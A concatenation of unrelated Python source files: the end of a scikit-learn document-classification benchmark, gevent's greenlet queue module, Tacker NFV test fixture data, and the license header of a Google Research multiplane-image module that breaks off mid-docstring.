    # Linear models expose their weights; report sparsity and, optionally,
    # the highest-weighted terms per class.
    if hasattr(clf, 'coef_'):
        print("dimensionality: %d" % clf.coef_.shape[1])
        print("density: %f" % density(clf.coef_))
        if opts.print_top10 and feature_names is not None:
            print("top 10 keywords per class:")
            for i, category in enumerate(categories):
                # argsort ascending -> last 10 are the largest weights.
                top10 = np.argsort(clf.coef_[i])[-10:]
                print(trim("%s: %s"
                      % (category, " ".join(feature_names[top10]))))
        print()
    if opts.print_report:
        print("classification report:")
        print(metrics.classification_report(y_test, pred,
                                            target_names=categories))
    if opts.print_cm:
        print("confusion matrix:")
        print(metrics.confusion_matrix(y_test, pred))
    print()
    # The classifier name is everything before the first '(' in repr(clf).
    clf_descr = str(clf).split('(')[0]
    return clf_descr, score, train_time, test_time
results = []
# Benchmark a spread of classifier families on the same features.
for clf, name in (
        (RidgeClassifier(tol=1e-2, solver="lsqr"), "Ridge Classifier"),
        (Perceptron(n_iter=50), "Perceptron"),
        (PassiveAggressiveClassifier(n_iter=50), "Passive-Aggressive"),
        (KNeighborsClassifier(n_neighbors=10), "kNN"),
        (RandomForestClassifier(n_estimators=100), "Random forest")):
    print('=' * 80)
    print(name)
    results.append(benchmark(clf))
for penalty in ["l2", "l1"]:
    print('=' * 80)
    print("%s penalty" % penalty.upper())
    # Train Liblinear model
    results.append(benchmark(LinearSVC(loss='l2', penalty=penalty,
                                       dual=False, tol=1e-3)))
    # Train SGD model
    results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,
                                           penalty=penalty)))
# Train SGD with Elastic Net penalty
print('=' * 80)
print("Elastic-Net penalty")
results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,
                                       penalty="elasticnet")))
# Train NearestCentroid without threshold
print('=' * 80)
print("NearestCentroid (aka Rocchio classifier)")
results.append(benchmark(NearestCentroid()))
# Train sparse Naive Bayes classifiers
print('=' * 80)
print("Naive Bayes")
results.append(benchmark(MultinomialNB(alpha=.01)))
results.append(benchmark(BernoulliNB(alpha=.01)))
print('=' * 80)
print("LinearSVC with L1-based feature selection")
# The smaller C, the stronger the regularization.
# The more regularization, the more sparsity.
results.append(benchmark(Pipeline([
  ('feature_selection', LinearSVC(penalty="l1", dual=False, tol=1e-3)),
  ('classification', LinearSVC())
])))
# make some plots
indices = np.arange(len(results))
# Transpose the list of (name, score, train_time, test_time) tuples into
# four parallel lists.
results = [[x[i] for x in results] for i in range(4)]
clf_names, score, training_time, test_time = results
# Normalize times to the slowest run so all bars share a 0-1 scale.
training_time = np.array(training_time) / np.max(training_time)
test_time = np.array(test_time) / np.max(test_time)
plt.figure(figsize=(12, 8))
plt.title("Score")
plt.barh(indices, score, .2, label="score", color='navy')
plt.barh(indices + .3, training_time, .2, label="training time",
         color='c')
plt.barh(indices + .6, test_time, .2, label="test time", color='darkorange')
plt.yticks(())
plt.legend(loc='best')
plt.subplots_adjust(left=.25)
plt.subplots_adjust(top=.95)
plt.subplots_adjust(bottom=.05)
for i, c in zip(indices, clf_names):
    plt.text(-.3, i, c)
plt.show()
| |
# Copyright (c) 2009-2010 Denis Bilenko. See LICENSE for details.
"""Synchronized queues.
The :mod:`gevent.queue` module implements multi-producer, multi-consumer queues
that work across greenlets, with the API similar to the classes found in the
standard :mod:`Queue` and :class:`multiprocessing <multiprocessing.Queue>` modules.
A major difference is that queues in this module operate as channels when
initialized with *maxsize* of zero. In such case, both :meth:`Queue.empty`
and :meth:`Queue.full` return ``True`` and :meth:`Queue.put` always blocks until a call
to :meth:`Queue.get` retrieves the item.
Another interesting difference is that :meth:`Queue.qsize`, :meth:`Queue.empty`, and
:meth:`Queue.full` *can* be used as indicators of whether the subsequent :meth:`Queue.get`
or :meth:`Queue.put` will not block.
Additionally, queues in this module implement iterator protocol. Iterating over queue
means repeatedly calling :meth:`get <Queue.get>` until :meth:`get <Queue.get>` returns ``StopIteration``.
>>> queue = gevent.queue.Queue()
>>> queue.put(1)
>>> queue.put(2)
>>> queue.put(StopIteration)
>>> for item in queue:
... print item
1
2
"""
import sys
import heapq
import collections
from Queue import Full, Empty
from gevent.timeout import Timeout
from gevent.hub import get_hub, Waiter, getcurrent, _NONE
from gevent import core
__all__ = ['Queue', 'PriorityQueue', 'LifoQueue', 'JoinableQueue']
class Queue(object):
    """Create a queue object with a given maximum size.
    If *maxsize* is less than zero or ``None``, the queue size is infinite.
    ``Queue(0)`` is a channel, that is, its :meth:`put` method always blocks until the
    item is delivered. (This is unlike the standard :class:`Queue`, where 0 means
    infinite size).
    """
    def __init__(self, maxsize=None):
        # On Python 2, None < 0 is True, so maxsize=None also takes this
        # branch; either way an unbounded queue stores maxsize as None.
        if maxsize < 0:
            self.maxsize = None
        else:
            self.maxsize = maxsize
        # Greenlet waiters currently blocked in get() / put().
        self.getters = set()
        self.putters = set()
        # Pending core.active_event that will run _unlock(); None when idle.
        self._event_unlock = None
        self._init(maxsize)
    # QQQ make maxsize into a property with setter that schedules unlock if necessary
    def _init(self, maxsize):
        # Storage hook -- subclasses override this (and _get/_put) to
        # change the queueing discipline.
        self.queue = collections.deque()
    def _get(self):
        # FIFO retrieval by default.
        return self.queue.popleft()
    def _put(self, item):
        self.queue.append(item)
    def __repr__(self):
        return '<%s at %s %s>' % (type(self).__name__, hex(id(self)), self._format())
    def __str__(self):
        return '<%s %s>' % (type(self).__name__, self._format())
    def _format(self):
        # Human-readable state summary used by __repr__/__str__.
        result = 'maxsize=%r' % (self.maxsize, )
        if getattr(self, 'queue', None):
            result += ' queue=%r' % self.queue
        if self.getters:
            result += ' getters[%s]' % len(self.getters)
        if self.putters:
            result += ' putters[%s]' % len(self.putters)
        if self._event_unlock is not None:
            result += ' unlocking'
        return result
    def qsize(self):
        """Return the size of the queue."""
        return len(self.queue)
    def empty(self):
        """Return ``True`` if the queue is empty, ``False`` otherwise."""
        return not self.qsize()
    def full(self):
        """Return ``True`` if the queue is full, ``False`` otherwise.
        ``Queue(None)`` is never full.
        """
        # On Python 2, int >= None is False, so an unbounded queue is
        # never reported full.
        return self.qsize() >= self.maxsize
    def put(self, item, block=True, timeout=None):
        """Put an item into the queue.
        If optional arg *block* is true and *timeout* is ``None`` (the default),
        block if necessary until a free slot is available. If *timeout* is
        a positive number, it blocks at most *timeout* seconds and raises
        the :class:`Full` exception if no free slot was available within that time.
        Otherwise (*block* is false), put an item on the queue if a free slot
        is immediately available, else raise the :class:`Full` exception (*timeout*
        is ignored in that case).
        """
        if self.maxsize is None or self.qsize() < self.maxsize:
            # there's a free slot, put an item right away
            self._put(item)
            if self.getters:
                self._schedule_unlock()
        elif not block and get_hub() is getcurrent():
            # we're in the mainloop, so we cannot wait; we can switch() to other greenlets though
            # find a getter and deliver an item to it
            while self.getters:
                getter = self.getters.pop()
                if getter:
                    # Route the item through _put/_get so subclass ordering
                    # (priority, LIFO) still applies before delivery.
                    self._put(item)
                    item = self._get()
                    getter.switch(item)
                    return
            raise Full
        elif block:
            waiter = ItemWaiter(item)
            self.putters.add(waiter)
            timeout = Timeout.start_new(timeout, Full)
            try:
                if self.getters:
                    self._schedule_unlock()
                # Blocks until _unlock() switches back into this greenlet.
                result = waiter.get()
                assert result is waiter, "Invalid switch into Queue.put: %r" % (result, )
                # _unlock() sets waiter.item to _NONE when it has already
                # transferred the item itself.
                if waiter.item is not _NONE:
                    self._put(item)
            finally:
                timeout.cancel()
                self.putters.discard(waiter)
        else:
            raise Full
    def put_nowait(self, item):
        """Put an item into the queue without blocking.
        Only enqueue the item if a free slot is immediately available.
        Otherwise raise the :class:`Full` exception.
        """
        self.put(item, False)
    def get(self, block=True, timeout=None):
        """Remove and return an item from the queue.
        If optional args *block* is true and *timeout* is ``None`` (the default),
        block if necessary until an item is available. If *timeout* is a positive number,
        it blocks at most *timeout* seconds and raises the :class:`Empty` exception
        if no item was available within that time. Otherwise (*block* is false), return
        an item if one is immediately available, else raise the :class:`Empty` exception
        (*timeout* is ignored in that case).
        """
        if self.qsize():
            if self.putters:
                # A slot just freed up; let a blocked putter proceed.
                self._schedule_unlock()
            return self._get()
        elif not block and get_hub() is getcurrent():
            # special case to make get_nowait() runnable in the mainloop greenlet
            # there are no items in the queue; try to fix the situation by unlocking putters
            while self.putters:
                putter = self.putters.pop()
                if putter:
                    putter.switch(putter)
                    if self.qsize():
                        return self._get()
            raise Empty
        elif block:
            waiter = Waiter()
            timeout = Timeout.start_new(timeout, Empty)
            try:
                self.getters.add(waiter)
                if self.putters:
                    self._schedule_unlock()
                # Blocks until _unlock() (or a putter) switches an item in.
                return waiter.get()
            finally:
                self.getters.discard(waiter)
                timeout.cancel()
        else:
            raise Empty
    def get_nowait(self):
        """Remove and return an item from the queue without blocking.
        Only get an item if one is immediately available. Otherwise
        raise the :class:`Empty` exception.
        """
        return self.get(False)
    def _unlock(self):
        # Runs in the hub as the unlock-event callback: pairs up waiting
        # getters/putters with available items/slots until no further
        # progress can be made.
        try:
            while True:
                if self.qsize() and self.getters:
                    # An item is available for a waiting getter.
                    getter = self.getters.pop()
                    if getter:
                        try:
                            item = self._get()
                        except:
                            getter.throw(*sys.exc_info())
                        else:
                            getter.switch(item)
                elif self.putters and self.getters:
                    # Channel-style rendezvous: hand a blocked putter's
                    # item straight to a blocked getter.
                    putter = self.putters.pop()
                    if putter:
                        getter = self.getters.pop()
                        if getter:
                            item = putter.item
                            putter.item = _NONE # this makes greenlet calling put() not to call _put() again
                            self._put(item)
                            item = self._get()
                            getter.switch(item)
                            putter.switch(putter)
                        else:
                            self.putters.add(putter)
                elif self.putters and (self.getters or self.qsize() < self.maxsize):
                    # A free slot opened up for a blocked putter.
                    putter = self.putters.pop()
                    putter.switch(putter)
                else:
                    break
        finally:
            self._event_unlock = None # QQQ maybe it's possible to obtain this info from libevent?
            # i.e. whether this event is pending _OR_ currently executing
            # testcase: 2 greenlets: while True: q.put(q.get()) - nothing else has a chance to execute
            # to avoid this, schedule unlock with timer(0, ...) once in a while
    def _schedule_unlock(self):
        if self._event_unlock is None:
            # Defer rebalancing to the hub via a one-shot event so waiters
            # are woken outside the current greenlet's call stack.
            self._event_unlock = core.active_event(self._unlock)
            # QQQ re-activate event (with event_active libevent call) instead of creating a new one each time
    def __iter__(self):
        return self
    def next(self):
        # Python 2 iterator protocol: a queued StopIteration instance
        # (see the module docstring) terminates iteration.
        result = self.get()
        if result is StopIteration:
            raise result
        return result
class ItemWaiter(Waiter):
    """Waiter that also carries the item a blocked put() wants to enqueue."""
    # 'item' holds the pending value; Queue._unlock() resets it to _NONE
    # once the item has been transferred.
    __slots__ = ['item']
    def __init__(self, item):
        Waiter.__init__(self)
        self.item = item
class PriorityQueue(Queue):
    '''A subclass of :class:`Queue` that retrieves entries in priority order (lowest first).
    Entries are typically tuples of the form: ``(priority number, data)``.
    '''
    def _init(self, maxsize):
        # A heap-ordered list; size limits are enforced by the base class.
        self.queue = []
    def _put(self, item, heappush=heapq.heappush):
        # heappush/heappop are bound as default args for fast local lookup.
        heappush(self.queue, item)
    def _get(self, heappop=heapq.heappop):
        return heappop(self.queue)
class LifoQueue(Queue):
    '''A subclass of :class:`Queue` that retrieves most recently added entries first.'''
    def _init(self, maxsize):
        # Plain list used as a stack.
        self.queue = []
    def _put(self, item):
        self.queue.append(item)
    def _get(self):
        # Pop from the same end items are appended to: LIFO order.
        return self.queue.pop()
class JoinableQueue(Queue):
    '''A subclass of :class:`Queue` that additionally has :meth:`task_done` and :meth:`join` methods.'''
    def __init__(self, maxsize=None):
        # Imported here to avoid a circular import at module load time.
        from gevent.event import Event
        Queue.__init__(self, maxsize)
        # Number of items put but not yet acknowledged via task_done().
        self.unfinished_tasks = 0
        # Set whenever there is no outstanding work; join() waits on it.
        self._cond = Event()
        self._cond.set()
    def _format(self):
        result = Queue._format(self)
        if self.unfinished_tasks:
            result += ' tasks=%s _cond=%s' % (self.unfinished_tasks, self._cond)
        return result
    def _put(self, item):
        Queue._put(self, item)
        # Every enqueued item is one more unfinished task; block join()
        # until it is acknowledged.
        self.unfinished_tasks += 1
        self._cond.clear()
    def task_done(self):
        '''Indicate that a formerly enqueued task is complete. Used by queue consumer threads.
        For each :meth:`get <Queue.get>` used to fetch a task, a subsequent call to :meth:`task_done` tells the queue
        that the processing on the task is complete.
        If a :meth:`join` is currently blocking, it will resume when all items have been processed
        (meaning that a :meth:`task_done` call was received for every item that had been
        :meth:`put <Queue.put>` into the queue).
        Raises a :exc:`ValueError` if called more times than there were items placed in the queue.
        '''
        if self.unfinished_tasks <= 0:
            raise ValueError('task_done() called too many times')
        self.unfinished_tasks -= 1
        if self.unfinished_tasks == 0:
            self._cond.set()
    def join(self):
        '''Block until all items in the queue have been gotten and processed.
        The count of unfinished tasks goes up whenever an item is added to the queue.
        The count goes down whenever a consumer thread calls :meth:`task_done` to indicate
        that the item was retrieved and all work on it is complete. When the count of
        unfinished tasks drops to zero, :meth:`join` unblocks.
        '''
        self._cond.wait()
| |
# Copyright (C) 2019 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import iso8601
from tacker.db.db_sqlalchemy import models
from tacker.tests import constants
from tacker.tests import uuidsentinel
# Base attributes for building a fake VNF package DB record.
vnf_package_data = {'algorithm': None, 'hash': None,
                    'location_glance_store': None,
                    'onboarding_state': 'CREATED',
                    'operational_state': 'DISABLED',
                    'tenant_id': uuidsentinel.tenant_id,
                    'usage_state': 'NOT_IN_USE',
                    'user_data': {'abc': 'xyz'},
                    'created_at': datetime.datetime(
                        2019, 8, 8, 0, 0, 0, tzinfo=iso8601.UTC),
                    'deleted': False,
                    'size': 0
                    }
# Fake software-image attributes for a VNF deployment flavour.
software_image = {
    'software_image_id': uuidsentinel.software_image_id,
    'name': 'test', 'provider': 'test', 'version': 'test',
    'algorithm': 'sha-256',
    'hash': 'b9c3036539fd7a5f87a1bf38eb05fdde8b556a1'
            'a7e664dbeda90ed3cd74b4f9d',
    'container_format': 'test', 'disk_format': 'qcow2', 'min_disk': 1,
    'min_ram': 2, 'size': 1, 'image_path': 'test',
    'metadata': {'key1': 'value1'}
}
# Fake artifact attributes (file-based variant).
artifact_data = {
    'file_name': 'test', 'type': 'test',
    'algorithm': 'sha-256',
    'hash': 'b9c3036539fd7a5f87a1bf38eb05fdde8b556a1'
            'a7e664dbeda90ed3cd74b4f9d',
    'metadata': {'key1': 'value1'}
}
# Fake artifact attributes (inline-JSON variant).
artifacts = {
    'json_data': 'test data',
    'type': 'tosca.artifacts.nfv.SwImage',
    'algorithm': 'sha512', 'hash': uuidsentinel.hash}
# Sample VNF-package API filter body.
# NOTE(review): the name shadows the builtin ``filter``; kept as-is since
# other test modules may import it by this name.
filter = {
    "usageState": ["NOT_IN_USE"],
    "vnfPkgId": ["f04857cb-abdc-405f-8254-01501f3fa059"],
    "vnfdId": ["b1bb0ce7-5555-0001-95ed-4840d70a1209"],
    "vnfInstanceSubscriptionFilter": {"vnfdIds": []},
    "vnfProductsFromProviders": [
        {
            "vnfProvider": "xxxxx",
            "vnfProducts": [
                {
                    "vnfProductName": "artifactVNF",
                    "versions": [
                        {
                            "vnfSoftwareVersion": "1.0",
                            "vnfdVersions": ["v2.2"]
                        }
                    ]
                }
            ]
        },
        {
            "vnfProvider": "xxxxx",
            "vnfProducts": [
                {
                    "vnfProductName": "artifactVNF",
                    "versions": [
                        {
                            "vnfSoftwareVersion": "1.0",
                            "vnfdVersions": ["v2.2"]
                        }
                    ]
                }
            ]
        }
    ],
    "notificationTypes": ["VnfLcmOperationOccurrenceNotification"],
    "operationalState": ["ENABLED"],
    "tenant_id": uuidsentinel.tenant_id
}
# Fake LCCN subscription record.
subscription_data = {
    'id': "c3e5ea85-8e3d-42df-a636-3b7857cbd7f9",
    'callback_uri': "fake_url",
    'created_at': "2020-06-11 09:39:58",
    'tenant_id': uuidsentinel.tenant_id
}
# Legacy VNFD catalog entry.
vnfd_data = {
    "tenant_id": uuidsentinel.tenant_id,
    'name': 'test',
    'description': 'test_description',
    'mgmt_driver': 'test_mgmt_driver'
}
vnfd_attribute = {
    'key': 'test_key',
    'value': 'test_value',
}
# Fake LCM operation occurrence (no id/instance; see get_lcm_op_occs_data
# for the parameterized variant).
lcm_op_occs_data = {
    "tenant_id": uuidsentinel.tenant_id,
    'operation_state': 'PROCESSING',
    'state_entered_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
                                            tzinfo=iso8601.UTC),
    'start_time': datetime.datetime(1900, 1, 1, 1, 1, 1,
                                    tzinfo=iso8601.UTC),
    'operation': 'MODIFY_INFO',
    'is_automatic_invocation': 0,
    'is_cancel_pending': 0,
}
# Fake VIM registration record.
vim_data = {
    'id': uuidsentinel.vim_id,
    'type': 'test_type',
    "tenant_id": uuidsentinel.tenant_id,
    'name': "test_name",
    'description': "test_description",
    'placement_attr': "test_placement_attr",
    'shared': 0,
    'status': "REACHABLE",
    'is_default': 0
}
# API-style view of vnf_package_data: drops internal user_data, adds id.
fake_vnf_package_response = copy.deepcopy(vnf_package_data)
fake_vnf_package_response.pop('user_data')
fake_vnf_package_response.update({'id': uuidsentinel.package_uuid})
# Fake deployment flavour with two instantiation levels.
vnf_deployment_flavour = {'flavour_id': 'simple',
                          'flavour_description': 'simple flavour description',
                          'instantiation_levels': {
                              'levels': {
                                  'instantiation_level_1': {
                                      'description': 'Smallest size',
                                      'scale_info': {
                                          'worker_instance': {
                                              'scale_level': 0
                                          }
                                      }
                                  },
                                  'instantiation_level_2': {
                                      'description': 'Largest size',
                                      'scale_info': {
                                          'worker_instance': {
                                              'scale_level': 2
                                          }
                                      }
                                  }
                              },
                              'default_level': 'instantiation_level_1'
                          },
                          'created_at': datetime.datetime(
                              2019, 8, 8, 0, 0, 0, tzinfo=iso8601.UTC),
                          }
# Fake artifact stored for a VNF package.
vnf_artifacts = {
    'artifact_path': 'scripts/install.sh',
    '_metadata': {},
    'algorithm': 'sha-256',
    'hash': 'd0e7828293355a07c2dccaaa765c80b507e60e6167067c950dc2e6b0da0dbd8b',
    'created_at': datetime.datetime(2020, 6, 29, 0, 0, 0, tzinfo=iso8601.UTC),
}
def fake_vnf_package_vnfd_dict(**updates):
    """Return a fake vnf_package_vnfd dict, with *updates* overriding
    the defaults."""
    vnf_pkg_vnfd = dict(
        package_uuid=uuidsentinel.package_uuid,
        vnfd_id=uuidsentinel.vnfd_id,
        vnf_provider='test vnf provider',
        vnf_product_name='Sample VNF',
        vnf_software_version='1.0',
        vnfd_version='1.0',
    )
    vnf_pkg_vnfd.update(updates)
    return vnf_pkg_vnfd
def return_vnf_package_vnfd_data():
    """Return a models.VnfPackageVnfd populated with the fake vnfd dict."""
    model_obj = models.VnfPackageVnfd()
    model_obj.update(fake_vnf_package_vnfd_dict())
    return model_obj
def get_vnf_package_vnfd_data(vnf_package_id, vnfd_id):
    """Build a fake vnf_package_vnfd row for the given package/vnfd ids."""
    return dict(
        package_uuid=vnf_package_id,
        vnfd_id=vnfd_id,
        vnf_provider='test vnf provider',
        vnf_product_name='Sample VNF',
        vnf_software_version='1.0',
        vnf_pkg_id=uuidsentinel.vnf_pkg_id,
        vnfd_version='1.0',
    )
def get_vnf_instance_data(vnfd_id):
    """Build a fake (not yet instantiated) VnfInstance record."""
    return dict(
        vnf_software_version="1.0",
        vnf_product_name="Sample VNF",
        vnf_instance_name='Sample VNF Instance',
        vnf_instance_description='Sample vnf_instance_description',
        instantiation_state="NOT_INSTANTIATED",
        vnf_provider="test vnf provider",
        vnfd_id=vnfd_id,
        vnfd_version="1.0",
        tenant_id=uuidsentinel.tenant_id,
        vnf_pkg_id=uuidsentinel.vnf_pkg_id,
        vnf_metadata={"key": "value"},
    )
def get_vnf_instance_data_with_id(vnfd_id):
    """Same record as get_vnf_instance_data() but with an explicit id
    (the tenant_id sentinel, as in the original fixture)."""
    data = {"id": uuidsentinel.tenant_id}
    data.update(get_vnf_instance_data(vnfd_id))
    return data
def get_lcm_op_occs_data(id, vnf_instance_id):
    """Build a fake LCM operation occurrence for the given ids."""
    return dict(
        id=id,
        tenant_id=uuidsentinel.tenant_id,
        operation_state='PROCESSING',
        state_entered_time=datetime.datetime(1900, 1, 1, 1, 1, 1,
                                             tzinfo=iso8601.UTC),
        start_time=datetime.datetime(1900, 1, 1, 1, 1, 1,
                                     tzinfo=iso8601.UTC),
        vnf_instance_id=vnf_instance_id,
        operation='MODIFY_INFO',
        is_automatic_invocation=0,
        is_cancel_pending=0,
    )
def fake_vnf_instance_model_dict(**updates):
    """Return a fake VnfInstance model dict, with *updates* overriding
    the defaults."""
    vnf_instance = dict(
        deleted=False,
        deleted_at=None,
        updated_at=None,
        created_at=datetime.datetime(1900, 1, 1, 1, 1, 1,
                                     tzinfo=iso8601.UTC),
        vnf_product_name='Sample VNF',
        vnf_instance_name='Sample VNF',
        vnf_instance_description=None,
        vnf_provider='test vnf provider',
        vnf_software_version='1.0',
        vnfd_id=uuidsentinel.vnfd_id,
        vnfd_version='1.0',
        instantiation_state='NOT_INSTANTIATED',
        vim_connection_info=[],
        tenant_id='33f8dbdae36142eebf214c1869eb4e4c',
        vnf_pkg_id=uuidsentinel.vnf_pkg_id,
        id=constants.UUID,
        vnf_metadata={"key": "value"},
    )
    vnf_instance.update(updates)
    return vnf_instance
def fake_vnf_resource_data(instance_id):
    """Build a fake VnfResource record owned by *instance_id*."""
    return dict(
        vnf_instance_id=instance_id,
        resource_name="test",
        resource_type="image",
        resource_identifier=uuidsentinel.image_id,
        resource_status="status",
        tenant_id=uuidsentinel.tenant_id,
    )
def vnf_pack_vnfd_data(vnf_pack_id):
    """Build a fake VnfPackageVnfd row for *vnf_pack_id*."""
    return dict(
        package_uuid=vnf_pack_id,
        vnfd_id=uuidsentinel.vnfd_id,
        vnf_provider='test_provider',
        vnf_product_name='test_product_name',
        vnf_software_version='test_version',
        vnfd_version='test_vnfd_version',
    )
def vnf_pack_artifact_data(vnf_pack_id):
    """Build a fake VNF package artifact row for *vnf_pack_id*."""
    sha256 = ('d0e7828293355a07c2dccaaa765c80b507e'
              '60e6167067c950dc2e6b0da0dbd8b')
    return dict(
        package_uuid=vnf_pack_id,
        artifact_path='scripts/install.sh',
        algorithm='sha-256',
        hash=sha256,
        _metadata={},
    )
# ---- Building blocks for fake instantiated-VNF info structures ----
ip_address = [{
    'type': 'IPV4',
    'is_dynamic': True
}]
ip_over_ethernet_address_info = {
    'mac_address': 'fake_mac',
    'ip_addresses': ip_address,
}
cp_protocol_info = {
    'layer_protocol': 'IP_OVER_ETHERNET',
    'ip_over_ethernet': ip_over_ethernet_address_info,
}
vnf_external_cp_info = {
    'id': uuidsentinel.external_cp_id,
    'cpd_id': uuidsentinel.cpd_id,
    'ext_link_port_id': uuidsentinel.ext_link_port_id
}
# Shared by several structures below (by reference, not copied).
resource_handle_info = {
    'resource_id': uuidsentinel.resource_id,
    'vim_level_resource_type': 'TEST'
}
ext_link_port_info = {
    'id': uuidsentinel.ext_link_port_id,
    'resource_handle': resource_handle_info,
    'cp_instance_id': uuidsentinel.cp_instance_id,
}
ext_virtual_link_info = {
    'id': uuidsentinel.virtual_link_id,
    'resource_handle': resource_handle_info,
    'ext_link_ports': [ext_link_port_info],
}
vnf_link_ports = {
    'id': uuidsentinel.vnf_link_ports_id,
    'resource_handle': resource_handle_info,
    'cp_instance_id': uuidsentinel.cp_instance_id
}
ext_managed_virtual_link_info = {
    'id': uuidsentinel.ext_managed_virtual_link_id,
    'vnf_virtual_link_desc_id': uuidsentinel.vnf_virtual_link_desc_id,
    'network_resource': resource_handle_info,
    'vnf_link_ports': [vnf_link_ports],
}
# NOTE(review): this first vnfc_resource_info is immediately shadowed by
# the fuller definition below and is therefore dead data.
vnfc_resource_info = {
    'id': uuidsentinel.resource_info_id,
    'vdu_id': 'vdu1',
    'compute_resource': None,
    'storage_resource_ids': [uuidsentinel.id1, uuidsentinel.id2],
    'reservation_id': uuidsentinel.reservation_id,
    'vnfc_cp_info': None,
    'metadata': {'key': 'value'}
}
vnfc_cp_info = {
    'id': uuidsentinel.cp_instance_id,
    'cpd_id': uuidsentinel.cpd_id,
    'vnf_ext_cp_id': uuidsentinel.vnf_ext_cp_id,
    'cp_protocol_info': [cp_protocol_info],
    'vnf_link_port_id': uuidsentinel.vnf_link_port_id,
}
# Effective definition of vnfc_resource_info (overrides the one above).
vnfc_resource_info = {
    'id': uuidsentinel.resource_info_id,
    'vdu_id': uuidsentinel.vdu_id,
    'compute_resource': resource_handle_info,
    'storage_resource_ids': [uuidsentinel.id1, uuidsentinel.id2],
    'reservation_id': uuidsentinel.reservation_id,
    'vnfc_cp_info': [vnfc_cp_info],
    'metadata': {'key': 'value'}
}
ip_address_info = {
    'type': 'IPV4',
    'subnet_id': uuidsentinel.subnet_id,
    'is_dynamic': False,
    # NOTE(review): these look like truncated IPv4 addresses (3 octets) --
    # confirm they are intentional test values.
    'addresses': ['10.10.1', '10.10.2'],
}
vnf_virtual_link_resource_info = {
    'id': uuidsentinel.virtual_link_resource_id,
    'vnf_virtual_link_desc_id': uuidsentinel.vnf_virtual_link_desc_id,
    'network_resource': resource_handle_info,
    'vnf_link_ports': vnf_link_ports,
}
virtual_storage_resource_info = {
    'id': uuidsentinel.virtual_storage_resource_id,
    'virtual_storage_desc_id': uuidsentinel.virtual_storage_desc_id,
    'storage_resource': resource_handle_info,
}
vnf_ext_cp_info = {
    'id': uuidsentinel.id,
    'cpd_id': 'CP1',
    'cp_protocol_info': [cp_protocol_info],
    'associated_vnfc_cp_id': uuidsentinel.associated_vnfc_cp_id
}
def get_instantiated_vnf_info():
    """Return a minimal instantiated-VNF-info dict (flavour, state, id)."""
    return {
        'flavour_id': uuidsentinel.flavour_id,
        'vnf_state': 'STARTED',
        'instance_id': uuidsentinel.instance_id
    }
# Module-level instantiated-VNF-info sample; unlike the minimal variant
# returned by get_instantiated_vnf_info(), this one carries ext_cp_info
# and a vnf_instance_id.
instantiated_vnf_info = {
    'ext_cp_info': [vnf_ext_cp_info],
    'flavour_id': uuidsentinel.flavour_id,
    'vnf_state': 'STARTED',
    'vnf_instance_id': uuidsentinel.vnf_instance_id
}
def vnf_resource_model_object(vnf_resource):
    """Build a models.VnfResource DB object mirroring *vnf_resource*.

    Copies the listed attributes one-for-one; attribute and column names
    are identical.
    """
    fields = ('id', 'vnf_instance_id', 'resource_name', 'resource_type',
              'resource_identifier', 'resource_status')
    db_obj = models.VnfResource()
    db_obj.update({field: getattr(vnf_resource, field) for field in fields})
    return db_obj
def vnf_instance_model_object(vnf_instance):
    """Build a models.VnfInstance DB object mirroring *vnf_instance*.

    Copies the listed attributes one-for-one; attribute and column names
    are identical.
    """
    fields = ('id', 'vnf_instance_name', 'vnf_instance_description',
              'instantiation_state', 'task_state', 'vnfd_id', 'vnf_provider',
              'vnf_product_name', 'vnf_software_version', 'vnfd_version',
              'vim_connection_info', 'tenant_id', 'created_at', 'vnf_pkg_id',
              'vnf_metadata')
    db_obj = models.VnfInstance()
    db_obj.update({field: getattr(vnf_instance, field) for field in fields})
    return db_obj
def get_changed_info_data():
    """Return a sample VnfInfoModifications payload used by update tests."""
    changed_info = {}
    changed_info["vnf_instance_name"] = ""
    changed_info["vnf_instance_description"] = ""
    changed_info["metadata"] = {"test:": "test_value"}
    changed_info["vnf_configurable_properties"] = {"test": "test_value"}
    changed_info["vnfc_info_modifications_delete_ids"] = ["test1"]
    # Descriptor/package identity after the modification:
    changed_info["vnfd_id"] = "2c69a161-0000-4b0f-bcf8-391f8fc76600"
    changed_info["vnf_provider"] = "NEC"
    changed_info["vnf_product_name"] = "MME"
    changed_info["vnf_software_version"] = "1.0"
    changed_info["vnfd_version"] = "MME_1.0"
    return changed_info
def get_vnf(vnfd_id, vim_id):
    """Return a sample legacy VNF record bound to *vnfd_id* and *vim_id*."""
    vnf = dict(
        tenant_id=uuidsentinel.tenant_id,
        name="test_name",
        vnfd_id=vnfd_id,
        mgmt_ip_address="test_mgmt_ip_address",
        status="ACTIVE",
        description="test_description",
        placement_attr="test_placement_attr",
        vim_id=vim_id,
    )
    return vnf
def get_changed_ext_conn_data():
    """Return sample changedExtConnectivity data (one link, one port)."""
    network_handle = {
        "vim_connection_id": uuidsentinel.vim_connection_id,
        "resource_id": uuidsentinel.vl_resource_id,
        "vim_level_resource_type": "OS::Neutron::Net",
    }
    port_handle = {
        "vim_connection_id": uuidsentinel.vim_connection_id,
        "resource_id": uuidsentinel.port_resource_id,
        "vim_level_resource_type": "OS::Neutron::Port",
    }
    ext_link_port = {
        "id": uuidsentinel.ext_link_ports_id,
        "resource_handle": port_handle,
        "cp_instance_id": uuidsentinel.cp_instance_id,
    }
    return [{
        "id": uuidsentinel.change_ext_conn_id,
        "resource_handle": network_handle,
        "ext_link_ports": [ext_link_port],
    }]
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for learning to predict multiplane images (MPI).
For CVPR 2019 paper:
Pushing the Boundaries of View Extrapolation with Multiplane Images
